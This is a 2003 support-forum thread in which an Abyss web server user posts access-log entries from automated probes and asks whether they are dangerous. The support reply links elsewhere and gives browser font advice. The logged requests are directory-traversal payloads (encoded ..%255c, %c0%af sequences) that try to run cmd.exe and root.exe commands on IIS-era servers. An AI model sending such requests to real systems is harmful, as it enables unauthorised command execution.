FAQ  |  Search  |  Register  |  Profile  |  Log in to check your private messages  |  Log in
Hacking Attempts

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
carlton770
-


Joined: 08 May 2003
Posts: 1
Location: Atlanta
PostPosted: Thu May 08, 2003 12:45 pm    Post subject: Hacking Attempts Reply with quote

This is obviously some kind of hacking attempt, it's the second I've seen in two days of running my server.
I don't know much about hacking, but I can see them trying to access the command function and the C: root.
I'm running Zonealarm Pro and I have Abyss limited to TCP port 80 traffic only.
How can I determine what success these commands might have had?
Is there anything I need to do?
Is there any hazard in continuing to run this server?

PS - I'm legally blind, but choosing the "large font" option at the top of this message still leaves me with a tiny, tiny, tiny font to enter the message with. I assume that option applies to how the font will appear once the message is entered, but why have the option if you still can't see what you're typing originally? Just a thought from the visually impaired to the developer.

Log entry:
68.56.247.241 - - [08/May/2003:05:56:54 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
68.56.247.241 - - [08/May/2003:05:56:58 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
68.56.247.241 - - [08/May/2003:05:57:02 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
68.56.247.241 - - [08/May/2003:05:57:06 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
68.56.247.241 - - [08/May/2003:05:57:09 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:13 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:17 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:21 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:27 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:32 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:37 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
68.56.247.241 - - [08/May/2003:05:57:54 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""

Thanks,

Carlton
Back to top View user's profile Send private message
aprelium
-


Joined: 22 Mar 2002
Posts: 6800
PostPosted: Thu May 08, 2003 7:56 pm    Post subject: Re: Hacking Attempts Reply with quote
carlton770 wrote:
This is obviously some kind of hacking attempt, it's the second I've seen in two days of running my server.
I don't know much about hacking, but I can see them trying to access the command function and the C: root.
I'm running Zonealarm Pro and I have Abyss limited to TCP port 80 traffic only.
How can I determine what success these commands might have had?
Is there anything I need to do?
Is there any hazard in continuing to run this server?

Please read http://www.aprelium.com/forum/viewtopic.php?t=807 .

Quote:

PS - I'm legally blind, but choosing the "large font" option at the top of this message still leaves me with a tiny, tiny, tiny font to enter the message with. I assume that option applies to how the font will appear once the message is entered, but why have the option if you still can't see what you're typing originally? Just a thought from the visually impaired to the developer.

You should configure your browser to ignore font settings. Assuming you have Internet explorer, choose the Tools menu, then Internet Options, General, Accessibility, then check "Ignore font sizes specified on Web pages" and validate.
Next choose a large font in interbet explorer and all should be ok.
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group